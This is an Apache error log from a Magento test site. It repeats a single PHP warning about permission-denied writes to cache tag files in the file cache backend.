[Fri Sep 08 09:20:11.330653 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.335321 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.335346 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.339973 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.339996 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.345354 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.345387 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.345928 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.345955 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.349158 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.349179 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.353889 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.353910 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.360192 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.360216 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.370238 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.370268 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.374952 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.374981 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.379654 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.379679 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.384038 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.384061 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.389831 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.389856 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.394356 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.394383 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.399707 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.399741 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.403724 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.403748 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.408063 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.408087 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.412683 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.412708 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.422956 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.422984 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.428677 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.428797 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.496222 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.496252 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.500956 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.500982 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.599147 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.599173 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.787773 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.787802 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.809301 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.809337 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.813447 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.813472 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.817568 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.817588 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.821446 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.821466 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.825345 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.825363 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.829059 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.829084 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.832795 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.832813 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.837035 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.837052 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.840984 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.841002 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.845138 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.845155 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.849487 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.849504 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.853581 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.853601 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.857097 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.857114 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.860526 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.860543 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.864119 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.864136 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.867773 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.867795 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
